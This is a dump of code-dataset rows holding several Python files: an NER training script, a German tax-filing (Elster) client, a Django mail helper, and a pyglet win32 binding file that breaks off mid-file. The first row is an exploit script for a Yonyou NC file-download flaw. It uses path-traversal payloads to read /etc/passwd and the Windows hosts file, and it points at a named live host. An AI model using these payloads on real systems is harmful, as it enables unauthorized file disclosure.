hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acfb37e7e0a118d496771fd2c7339b134f96c119 | 971 | py | Python | Bugscan_exploits-master/exp_list/exp-747.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-747.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-747.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name: 用友 country 和 language字段任意文件下载
Author : a
mail : a@lcx.cc
Referer :http://www.wooyun.org/bugs/wooyun-2015-096676
"""
def assign(service, arg):
if service == "yongyou_nc":
return True, arg
def audit(arg):
payloads = [
'/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts%00.html' ,
'/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00.html'
]
for payload in payloads:
url = arg + payload
code, head, res, errcode, _ = curl.curl('"%s"' % url)
if code == 200 and "const.js" in head:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_nc','http://www.jumbohr.cn:8088/')[1])
| 31.322581 | 164 | 0.526262 |
acfb3a44eafc3a4b9b0827259f7b2ba8ccbfa0fc | 10,347 | py | Python | src/run_transformer_ner.py | uf-hobi-informatics-lab/UF_HOBI_NER_LIB | 8ab97f5889222337a3b61060a203de4fc3cdb5be | [
"MIT"
] | null | null | null | src/run_transformer_ner.py | uf-hobi-informatics-lab/UF_HOBI_NER_LIB | 8ab97f5889222337a3b61060a203de4fc3cdb5be | [
"MIT"
] | null | null | null | src/run_transformer_ner.py | uf-hobi-informatics-lab/UF_HOBI_NER_LIB | 8ab97f5889222337a3b61060a203de4fc3cdb5be | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import argparse
import warnings
import traceback
import torch
import transformers
from packaging import version
from transformer_ner.task import run_task
from transformer_biaffine_ner.task import run_task as run_biaffine_task
from transformer_ner.transfomer_log import TransformerNERLogger
pytorch_version = version.parse(transformers.__version__)
assert pytorch_version >= version.parse('3.0.0'), \
'we now only support transformers version >=3.0.0, but your version is {}'.format(pytorch_version)
def main():
parser = argparse.ArgumentParser()
# add arguments
parser.add_argument("--model_type", default='bert', type=str, required=True,
help="valid values: bert, roberta or xlnet")
parser.add_argument("--pretrained_model", type=str, default=None,
help="The pretrained model file or directory for fine tuning.")
# resume training on a NER model if set it will overwrite pretrained_model
parser.add_argument("--resume_from_model", type=str, default=None,
help="The NER model file or directory for continuous fine tuning.")
parser.add_argument("--config_name", default=None, type=str,
help="Pretrained config name or path if not the same as pretrained_model")
parser.add_argument("--tokenizer_name", default=None, type=str,
help="Pretrained tokenizer name or path if not the same as pretrained_model")
parser.add_argument("--data_dir", type=str, required=True,
help="The input data directory.")
parser.add_argument("--data_has_offset_information", action='store_true',
help="The input data directory.")
parser.add_argument("--new_model_dir", type=str, required=True,
help="directory for saving new model checkpoints (keep latest n only)")
parser.add_argument("--save_model_core", action='store_true',
help="""save the transformer core of the model
which allows model to be used as base model for further pretraining""")
parser.add_argument("--predict_output_file", type=str, default=None,
help="predicted results output file.")
parser.add_argument('--overwrite_model_dir', action='store_true',
help="Overwrite the content of the new model directory")
parser.add_argument("--seed", default=3, type=int,
help='random seed')
parser.add_argument("--max_seq_length", default=128, type=int,
help="maximum number of tokens allowed in each sentence")
parser.add_argument("--do_train", action='store_true',
help="Whether to run training.")
parser.add_argument("--model_selection_scoring", default='strict-f_score-1', type=str,
help="""The scoring methos used to select model on dev dataset
only support strict-f_score-n, relax-f_score-n (n is 0.5, 1, or 2)""")
parser.add_argument("--do_predict", action='store_true',
help="Whether to run prediction on the test set.")
parser.add_argument("--use_crf", action='store_true',
help="Whether to use crf layer as classifier.")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--train_batch_size", default=8, type=int,
help="The batch size for training.")
parser.add_argument("--eval_batch_size", default=8, type=int,
help="The batch size for eval.")
parser.add_argument('--train_steps', type=int, default=-1,
help="Number of trianing steps between two evaluations on the dev set; "
"if <0 then evaluate after each epoch")
parser.add_argument("--learning_rate", default=1e-5, type=float,
help="The initial learning rate for optimizer.")
parser.add_argument("--min_lr", default=1e-6, type=float,
help="The minimum number that lr can decay to.")
parser.add_argument("--num_train_epochs", default=10, type=float,
help="Total number of training epochs to perform.")
parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument("--do_warmup", action='store_true',
help='Whether to apply warmup strategy in optimizer.')
parser.add_argument("--warmup_ratio", default=0.1, type=float,
help="Linear warmup over warmup_ratio.")
parser.add_argument("--weight_decay", default=0.0, type=float,
help="Weight deay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float,
help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float,
help="Max gradient norm.")
parser.add_argument("--max_num_checkpoints", default=3, type=int,
help="max number of checkpoints saved during training, old checkpoints will be removed.")
parser.add_argument("--log_file", default=None,
help="where to save the log information")
parser.add_argument("--log_lvl", default="i", type=str,
help="d=DEBUG; i=INFO; w=WARNING; e=ERROR")
parser.add_argument("--progress_bar", action='store_true',
help="show progress during the training in tqdm")
parser.add_argument("--early_stop", default=-1, type=int,
help="""The training will stop after num of epoch without performance improvement.
If set to 0 or -1, then not use early stop.""")
parser.add_argument('--focal_loss', action='store_true',
help="use focal loss function instead of cross entropy loss")
parser.add_argument("--focal_loss_gamma", default=2, type=int,
help="the gamma hyperparameter in focal loss, commonly use 1 or 2")
parser.add_argument("--use_biaffine", action='store_true',
help="Whether to use biaffine for NER (https://www.aclweb.org/anthology/2020.acl-main.577/).")
parser.add_argument("--mlp_dim", default=128, type=int,
help="The output dimension for MLP layer in biaffine module, default to 128."
"If set this value <= 0, we use transformer model hidden layer dimension")
parser.add_argument("--mlp_layers", default=0, type=int,
help="The number of layers in MLP in biaffine module, default to 0 (1 linear layer)."
"if set to 1, then NLP will have three linear layers")
parser.add_argument("--mlp_hidden_dim", default=0, type=int,
help="The hidden dim of MLP layers in biaffine module, default to 0 (no use hidden layer)")
# adversarial training method: pgd, fgm
parser.add_argument("--adversarial_training_method", default=None,
help="what method to use for adversarial training, support pgd and fgm; "
"default is None which disable this function")
# fp16 and distributed training (we use pytorch naive implementation instead of Apex)
parser.add_argument('--fp16', action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
# TODO: data parallel - support single node multi GPUs (use deepspeed only or pytorch naive ddp?)
# parser.add_argument("--local_rank", type=int, default=-1, help="local_rank for distributed training on gpus")
global_args = parser.parse_args()
# create logger
logger = TransformerNERLogger(global_args.log_file, global_args.log_lvl).get_logger()
global_args.logger = logger
# set and check cuda (we recommend to set up CUDA device in shell)
# os.environ['CUDA_VISIBLE_DEVICES'] = global_args.cuda_ids
global_args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
logger.info("Task will use cuda device: GPU_{}.".format(
torch.cuda.current_device()) if torch.cuda.device_count() else 'Task will use CPU.')
# if use resume_from_model, then resume_from_model will overwrite pretrained_model
if global_args.resume_from_model:
global_args.pretrained_model = global_args.resume_from_model
if global_args.resume_from_model is None and global_args.pretrained_model is None:
raise RuntimeError("""Both resume_from_model and pretrained_model are not set.
You have to specify one of them.""")
# if args.tokenizer_name and args.config_name are not specially set, set them as pretrained_model
if not global_args.tokenizer_name:
global_args.tokenizer_name = global_args.pretrained_model
logger.warning("set tokenizer as {}".format(global_args.tokenizer_name))
if not global_args.config_name:
global_args.config_name = global_args.pretrained_model
logger.warning("set config as {}".format(global_args.config_name))
if global_args.do_predict and not global_args.predict_output_file:
raise RuntimeError("Running prediction but predict output file is not set.")
if global_args.focal_loss and global_args.use_crf:
warnings.warn(
"Using CRF cannot apply focal loss. CRF use viterbi decoding and loss will be calculated independently.")
warnings.warn("We will overwrite focal loss to false and use CRF as default.")
global_args.focal_loss = False
if global_args.use_crf and global_args.use_biaffine:
raise RuntimeError("You can not run both CRF and biaffine. Choose only one or None of them to proceed.")
try:
if global_args.use_biaffine:
run_biaffine_task(global_args)
else:
run_task(global_args)
except Exception as ex:
traceback.print_exc()
logger.error(traceback.format_exc())
if __name__ == '__main__':
main()
| 58.457627 | 118 | 0.653523 |
acfb3ac3fa6d7cf52851f72132016ac552f0f64e | 15,507 | py | Python | webapp/app/elster_client/elster_client.py | digitalservice4germany/steuerlotse | ef3e094e4d7d4768431a50ac4be60672cd03221d | [
"MIT"
] | 20 | 2021-07-02T07:49:08.000Z | 2022-03-18T22:26:10.000Z | webapp/app/elster_client/elster_client.py | digitalservice4germany/steuerlotse | ef3e094e4d7d4768431a50ac4be60672cd03221d | [
"MIT"
] | 555 | 2021-06-28T15:35:15.000Z | 2022-03-31T11:51:55.000Z | webapp/app/elster_client/elster_client.py | digitalservice4germany/steuerlotse | ef3e094e4d7d4768431a50ac4be60672cd03221d | [
"MIT"
] | 1 | 2021-07-04T20:34:12.000Z | 2021-07-04T20:34:12.000Z | import logging
import json
from datetime import datetime
from decimal import Decimal
import requests
from flask_login import current_user, logout_user
from markupsafe import escape
from app.config import Config
from app.data_access.audit_log_controller import create_audit_log_entry, create_audit_log_address_entry
from app.elster_client.elster_errors import ElsterGlobalError, ElsterGlobalValidationError, \
ElsterGlobalInitialisationError, ElsterTransferError, ElsterCryptError, ElsterIOError, ElsterPrintError, \
ElsterNullReturnedError, ElsterUnknownError, ElsterAlreadyRequestedError, ElsterRequestIdUnkownError, \
ElsterResponseUnexpectedStructure, GeneralEricaError, EricaIsMissingFieldError, ElsterRequestAlreadyRevoked, \
ElsterInvalidBufaNumberError, ElsterInvalidTaxNumberError
from app.utils import lru_cached, VERANLAGUNGSJAHR
logger = logging.getLogger(__name__)
_PYERIC_API_BASE_URL = Config.ERICA_BASE_URL
_REQUEST_TIMEOUT = 20
_BOOL_KEYS = ['familienstand_married_lived_separated', 'familienstand_widowed_lived_separated',
'person_b_same_address', 'request_new_tax_number',
'person_a_has_pflegegrad', 'person_a_has_merkzeichen_bl',
'person_a_has_merkzeichen_tbl', 'person_a_has_merkzeichen_h', 'person_a_has_merkzeichen_g',
'person_a_has_merkzeichen_ag', 'person_a_requests_pauschbetrag', 'person_a_requests_fahrtkostenpauschale',
'person_b_has_pflegegrad', 'person_b_has_merkzeichen_bl',
'person_b_has_merkzeichen_tbl', 'person_b_has_merkzeichen_h', 'person_b_has_merkzeichen_g',
'person_b_has_merkzeichen_ag', 'person_b_requests_pauschbetrag', 'person_b_requests_fahrtkostenpauschale',]
_DECIMAL_KEYS = ['stmind_haushaltsnahe_summe', 'stmind_handwerker_summe', 'stmind_handwerker_lohn_etc_summe',
'stmind_vorsorge_summe', 'stmind_religion_paid_summe', 'stmind_religion_reimbursed_summe',
'stmind_krankheitskosten_summe', 'stmind_krankheitskosten_anspruch', 'stmind_pflegekosten_summe',
'stmind_pflegekosten_anspruch', 'stmind_beh_aufw_summe',
'stmind_beh_aufw_anspruch', 'stmind_bestattung_summe', 'stmind_bestattung_anspruch',
'stmind_aussergbela_sonst_summe', 'stmind_aussergbela_sonst_anspruch']
_DATE_KEYS = ['familienstand_date', 'familienstand_married_lived_separated_since',
'familienstand_widowed_lived_separated_since', 'person_a_dob', 'person_b_dob', 'dob']
def send_to_erica(*args, **kwargs):
logger.info(f'Making Erica POST request with args {args!r}')
if Config.USE_MOCK_API:
from tests.elster_client.mock_erica import MockErica
response = MockErica.mocked_elster_requests(*args, **kwargs)
else:
headers = {'Content-type': 'application/json'}
response = requests.post(*args, headers=headers, timeout=_REQUEST_TIMEOUT, **kwargs)
logger.info(f'Completed Erica POST request with args {args!r}, got code {response.status_code}')
return response
def request_from_erica(*args, **kwargs):
logger.info(f'Making Erica GET request with args {args!r}')
if Config.USE_MOCK_API:
from tests.elster_client.mock_erica import MockErica
response = MockErica.mocked_elster_requests(*args, **kwargs)
else:
headers = {'Content-type': 'application/json'}
response = requests.get(*args, headers=headers, timeout=_REQUEST_TIMEOUT, **kwargs)
logger.info(f'Completed Erica GET request with args {args!r}, got code {response.status_code}')
return response
def send_est_with_elster(form_data, ip_address, year=VERANLAGUNGSJAHR, include_elster_responses=True):
"""The overarching method that is being called from the web backend. It
will send the form data for an ESt to the PyERiC server and then extract information from the response.
"""
params = {'include_elster_responses': include_elster_responses}
data_to_send = _generate_est_request_data(form_data, year=year)
pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/ests',
data=json.dumps(data_to_send, default=str), params=params)
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
create_audit_log_entry('est_submitted', ip_address, form_data['idnr'], response_data['transfer_ticket'])
return _extract_est_response_data(pyeric_response)
def validate_est_with_elster(form_data, year=VERANLAGUNGSJAHR, include_elster_responses=True):
"""The overarching method that is being called from the web backend. It
will send the form data for an ESt to the PyERiC server and then extract information from the response.
"""
data_to_send = _generate_est_request_data(form_data, year=year)
params = {'include_elster_responses': include_elster_responses}
pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/est_validations',
data=json.dumps(data_to_send, default=str), params=params)
check_pyeric_response_for_errors(pyeric_response)
return _extract_est_response_data(pyeric_response)
def send_unlock_code_request_with_elster(form_data, ip_address, include_elster_responses=False):
params = {'include_elster_responses': include_elster_responses}
pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/unlock_code_requests',
data=json.dumps(form_data, default=str), params=params)
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
create_audit_log_entry('unlock_code_request_sent',
ip_address,
form_data['idnr'],
response_data['transfer_ticket'],
response_data['elster_request_id'])
return response_data
def send_unlock_code_activation_with_elster(form_data, elster_request_id, ip_address, include_elster_responses=False):
user_data = form_data.copy()
user_data['elster_request_id'] = elster_request_id
params = {'include_elster_responses': include_elster_responses}
pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/unlock_code_activations',
data=json.dumps(user_data, default=str), params=params)
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
create_audit_log_entry('unlock_code_activation_sent',
ip_address,
form_data['idnr'],
response_data['transfer_ticket'],
response_data['elster_request_id'])
return response_data
def send_unlock_code_revocation_with_elster(form_data, ip_address, include_elster_responses=False):
params = {'include_elster_responses': include_elster_responses}
pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/unlock_code_revocations',
data=json.dumps(form_data, default=str), params=params)
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
create_audit_log_entry('unlock_code_revocation_sent',
ip_address, form_data['idnr'],
response_data['transfer_ticket'],
response_data['elster_request_id'])
return response_data
@lru_cached
def validate_tax_number(state_abbreviation, tax_number):
pyeric_response = request_from_erica(_PYERIC_API_BASE_URL + f'/tax_number_validity/{state_abbreviation}/{tax_number}')
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
return response_data['is_valid']
@lru_cached
def request_tax_offices():
pyeric_response = request_from_erica(_PYERIC_API_BASE_URL + '/tax_offices')
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
return response_data['tax_offices']
def _extract_est_response_data(pyeric_response):
"""Generates data from the pyeric response, which can be displayed to the user"""
response_json = pyeric_response.json()
if not ('pdf' in response_json and 'transfer_ticket' in response_json):
raise ElsterResponseUnexpectedStructure
extracted_data = {'was_successful': pyeric_response.status_code in [200, 201],
'pdf': response_json['pdf'].encode(),
'transfer_ticket': escape(response_json['transfer_ticket'])}
if 'eric_response' in response_json:
extracted_data['eric_response'] = escape(response_json['eric_response'])
if 'server_response' in response_json:
extracted_data['server_response'] = escape(response_json['server_response'])
return extracted_data
class TaxDeclarationNotDigitallySigned(Exception):
""" Raised in case a tax declaration should be send that has not been digitally signed"""
pass
def _generate_est_request_data(form_data, year=VERANLAGUNGSJAHR):
"""
Generates the data, which can be send to pyeric with the correct types
:param form_data: All information about the users taxes, which are taken from the userform
:param year: The year in which the taxes are declared
"""
adapted_form_data = form_data.copy()
if adapted_form_data.pop('is_user_account_holder', None):
adapted_form_data['account_holder'] = 'person_a'
for key in list(set(_BOOL_KEYS) & set(adapted_form_data.keys())):
if isinstance(adapted_form_data[key], str):
adapted_form_data[key] = adapted_form_data[key] == 'yes'
else:
adapted_form_data[key] = bool(adapted_form_data[key])
for key in list(set(_DECIMAL_KEYS) & set(adapted_form_data.keys())):
if adapted_form_data[key]:
adapted_form_data[key] = Decimal(adapted_form_data[key])
for key in list(set(_DATE_KEYS) & set(adapted_form_data.keys())):
if isinstance(adapted_form_data[key], str):
adapted_form_data[key] = datetime.strptime(adapted_form_data[key], '%Y-%m-%d').date()
if adapted_form_data.get('steuernummer_exists') == 'no' and adapted_form_data.get('request_new_tax_number'):
adapted_form_data['submission_without_tax_nr'] = True
if not current_user.is_active:
# no non-active user should come until here, but we want to log that as an error
logger.error('Elster_Client: Non-active user tried to send tax declaration.')
raise TaxDeclarationNotDigitallySigned
if not current_user.is_authenticated:
# no non-authenticated user should come until here, but we want to log that as an error
logger.error('Elster_Client: Non-authenticated user tried to send tax declaration.')
raise TaxDeclarationNotDigitallySigned
if current_user.unlock_code_hashed is None:
# no user should come until that point without an unlock code, but they should certainly not be able to send a tax declaration
logger.warning('Elster_Client: User without unlock code tried to send tax declaration.')
raise TaxDeclarationNotDigitallySigned
meta_data = {
'year': year,
}
return {'est_data': adapted_form_data, 'meta_data': meta_data}
def check_pyeric_response_for_errors(pyeric_response):
if pyeric_response.status_code in [200, 201]:
return
if pyeric_response.status_code == 422 and isinstance(pyeric_response.json()['detail'], dict):
error_detail = pyeric_response.json()['detail']
error_code = error_detail['code']
error_message = escape(error_detail['message'])
eric_response = escape(error_detail.get('eric_response'))
server_response = escape(error_detail.get('server_response'))
validation_problems = [escape(problem) for problem in
error_detail.get('validation_problems')] if error_detail.get(
'validation_problems') else None
server_err_msg = error_detail.get('server_err_msg')
erica_error = f'Error in erica response: code={error_code}, message="{error_message}", ' \
f'eric_response="{eric_response}", server_response="{server_response}", ' \
f'validation_problems="{validation_problems}" '
if server_err_msg:
th_res_code = escape(error_detail.get('server_err_msg').get('TH_RES_CODE'))
th_error_msg = escape(error_detail.get('server_err_msg').get('TH_ERR_MSG'))
ndh_error_xml = escape(error_detail.get('server_err_msg').get('NDH_ERR_XML'))
erica_error += f', elster_th_res_code="{th_res_code}", elster_th_error_msg="{th_error_msg}", ' \
f'elster_ndh_error_xml="{ndh_error_xml}"'
logger.info(erica_error)
if error_code == 1:
raise ElsterGlobalError(message=error_message)
elif error_code == 2:
raise ElsterGlobalValidationError(message=error_message, eric_response=eric_response,
validation_problems=validation_problems)
elif error_code == 3:
raise ElsterGlobalInitialisationError(message=error_message)
elif error_code == 4:
raise ElsterTransferError(message=error_message, eric_response=eric_response,
server_response=server_response)
elif error_code == 5:
raise ElsterCryptError(message=error_message)
elif error_code == 6:
raise ElsterIOError(message=error_message)
elif error_code == 7:
raise ElsterPrintError(message=error_message)
elif error_code == 8:
raise ElsterNullReturnedError(message=error_message)
elif error_code == 9:
raise ElsterAlreadyRequestedError(message=error_message, eric_response=eric_response,
server_response=server_response)
elif error_code == 10:
raise ElsterRequestIdUnkownError(message=error_message, eric_response=eric_response,
server_response=server_response)
elif error_code == 11:
raise ElsterRequestAlreadyRevoked(message=error_message, eric_response=eric_response,
server_response=server_response)
elif error_code == 12:
raise ElsterInvalidBufaNumberError()
elif error_code == 13:
raise ElsterInvalidTaxNumberError(message=error_message, eric_response=eric_response)
else:
raise ElsterUnknownError(message=error_message)
elif pyeric_response.status_code == 422 and \
any([error.get('type') == "value_error.missing" for error in pyeric_response.json()['detail']]):
raise EricaIsMissingFieldError()
else:
raise GeneralEricaError(message=pyeric_response.content)
def _log_address_data(ip_address, idnr, params):
"""Request address data from Erica and log it to audit logs."""
data_to_send = {'idnr': idnr}
pyeric_response = send_to_erica(_PYERIC_API_BASE_URL + '/address',
data=json.dumps(data_to_send, default=str), params=params)
check_pyeric_response_for_errors(pyeric_response)
response_data = pyeric_response.json()
create_audit_log_address_entry('est_address_queried', ip_address, idnr, response_data['address'])
| 48.459375 | 134 | 0.710195 |
acfb3c73dc0bcd9072f1f1ca8622a9f69b51ade0 | 652 | py | Python | django_saas_email/utils.py | leotrubach/django-saas-email | f410c9dd69d96f47ef19af88d266092a3bd60d4d | [
"MIT"
] | null | null | null | django_saas_email/utils.py | leotrubach/django-saas-email | f410c9dd69d96f47ef19af88d266092a3bd60d4d | [
"MIT"
] | null | null | null | django_saas_email/utils.py | leotrubach/django-saas-email | f410c9dd69d96f47ef19af88d266092a3bd60d4d | [
"MIT"
] | null | null | null | from .models import Mail
from .tasks import send_asynchronous_mail
from django.conf import settings
def create_and_send_mail(**kwargs):
from .models import Mail
from .tasks import send_asynchronous_mail
"""Helper method to create and send a mail.
create_and_send_mail(template_name="hello", context={'name': 'Jens'}, to_address="me@jensneuhaus.de")
"""
mail = Mail.objects.create_mail(**kwargs)
send_asynchronous_mail.delay(
mail.id, sendgrid_api=getattr(settings, "SENDGRID_API_KEY", False)
)
def _noautoescape(template):
return "{}{}{}".format("{% autoescape off %}", template, "{% endautoescape %}")
| 28.347826 | 105 | 0.711656 |
acfb3cdf8ee8fb90af27bf8d82e1f9e03e0072a3 | 12,074 | py | Python | pyglet/libs/win32/__init__.py | elosine/pythonfunwedy | a587f4db5da6c48849753e423e28ddb680963af2 | [
"MIT"
] | null | null | null | pyglet/libs/win32/__init__.py | elosine/pythonfunwedy | a587f4db5da6c48849753e423e28ddb680963af2 | [
"MIT"
] | null | null | null | pyglet/libs/win32/__init__.py | elosine/pythonfunwedy | a587f4db5da6c48849753e423e28ddb680963af2 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2019 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id: $
from __future__ import print_function
from __future__ import absolute_import
from builtins import object
import struct
import pyglet
from . import constants
from .types import *
IS64 = struct.calcsize("P") == 8
_debug_win32 = pyglet.options['debug_win32']
if _debug_win32:
import traceback
_GetLastError = windll.kernel32.GetLastError
_SetLastError = windll.kernel32.SetLastError
_FormatMessageA = windll.kernel32.FormatMessageA
_log_win32 = open('debug_win32.log', 'w')
def format_error(err):
msg = create_string_buffer(256)
_FormatMessageA(constants.FORMAT_MESSAGE_FROM_SYSTEM,
c_void_p(),
err,
0,
msg,
len(msg),
c_void_p())
return msg.value
class DebugLibrary(object):
def __init__(self, lib):
self.lib = lib
def __getattr__(self, name):
fn = getattr(self.lib, name)
def f(*args):
_SetLastError(0)
result = fn(*args)
err = _GetLastError()
if err != 0:
for entry in traceback.format_list(traceback.extract_stack()[:-1]):
_log_win32.write(entry)
print(format_error(err), file=_log_win32)
return result
return f
else:
DebugLibrary = lambda lib: lib
_gdi32 = DebugLibrary(windll.gdi32)
_kernel32 = DebugLibrary(windll.kernel32)
_user32 = DebugLibrary(windll.user32)
_dwmapi = DebugLibrary(windll.dwmapi)
# _gdi32
_gdi32.AddFontMemResourceEx.restype = HANDLE
_gdi32.AddFontMemResourceEx.argtypes = [PVOID, DWORD, PVOID, POINTER(DWORD)]
_gdi32.ChoosePixelFormat.restype = c_int
_gdi32.ChoosePixelFormat.argtypes = [HDC, POINTER(PIXELFORMATDESCRIPTOR)]
_gdi32.CreateBitmap.restype = HBITMAP
_gdi32.CreateBitmap.argtypes = [c_int, c_int, UINT, UINT, c_void_p]
_gdi32.CreateCompatibleDC.restype = HDC
_gdi32.CreateCompatibleDC.argtypes = [HDC]
_gdi32.CreateDIBitmap.restype = HBITMAP
_gdi32.CreateDIBitmap.argtypes = [HDC, POINTER(BITMAPINFOHEADER), DWORD, c_void_p, POINTER(BITMAPINFO), UINT]
_gdi32.CreateDIBSection.restype = HBITMAP
_gdi32.CreateDIBSection.argtypes = [HDC, c_void_p, UINT, c_void_p, HANDLE, DWORD] # POINTER(BITMAPINFO)
_gdi32.CreateFontIndirectA.restype = HFONT
_gdi32.CreateFontIndirectA.argtypes = [POINTER(LOGFONT)]
_gdi32.DeleteDC.restype = BOOL
_gdi32.DeleteDC.argtypes = [HDC]
_gdi32.DeleteObject.restype = BOOL
_gdi32.DeleteObject.argtypes = [HGDIOBJ]
_gdi32.DescribePixelFormat.restype = c_int
_gdi32.DescribePixelFormat.argtypes = [HDC, c_int, UINT, POINTER(PIXELFORMATDESCRIPTOR)]
_gdi32.ExtTextOutA.restype = BOOL
_gdi32.ExtTextOutA.argtypes = [HDC, c_int, c_int, UINT, LPRECT, c_char_p, UINT, POINTER(INT)]
_gdi32.GdiFlush.restype = BOOL
_gdi32.GdiFlush.argtypes = []
_gdi32.GetCharABCWidthsW.restype = BOOL
_gdi32.GetCharABCWidthsW.argtypes = [HDC, UINT, UINT, POINTER(ABC)]
_gdi32.GetCharWidth32W.restype = BOOL
_gdi32.GetCharWidth32W.argtypes = [HDC, UINT, UINT, POINTER(INT)]
_gdi32.GetStockObject.restype = HGDIOBJ
_gdi32.GetStockObject.argtypes = [c_int]
_gdi32.GetTextMetricsA.restype = BOOL
_gdi32.GetTextMetricsA.argtypes = [HDC, POINTER(TEXTMETRIC)]
_gdi32.SelectObject.restype = HGDIOBJ
_gdi32.SelectObject.argtypes = [HDC, HGDIOBJ]
_gdi32.SetBkColor.restype = COLORREF
_gdi32.SetBkColor.argtypes = [HDC, COLORREF]
_gdi32.SetBkMode.restype = c_int
_gdi32.SetBkMode.argtypes = [HDC, c_int]
_gdi32.SetPixelFormat.restype = BOOL
_gdi32.SetPixelFormat.argtypes = [HDC, c_int, POINTER(PIXELFORMATDESCRIPTOR)]
_gdi32.SetTextColor.restype = COLORREF
_gdi32.SetTextColor.argtypes = [HDC, COLORREF]
_gdi32.SwapBuffers.restype = BOOL
_gdi32.SwapBuffers.argtypes = [HDC]
_kernel32.CloseHandle.restype = BOOL
_kernel32.CloseHandle.argtypes = [HANDLE]
_kernel32.CreateEventW.restype = HANDLE
_kernel32.CreateEventW.argtypes = [POINTER(SECURITY_ATTRIBUTES), BOOL, BOOL, c_wchar_p]
_kernel32.CreateWaitableTimerA.restype = HANDLE
_kernel32.CreateWaitableTimerA.argtypes = [POINTER(SECURITY_ATTRIBUTES), BOOL, c_char_p]
_kernel32.GetCurrentThreadId.restype = DWORD
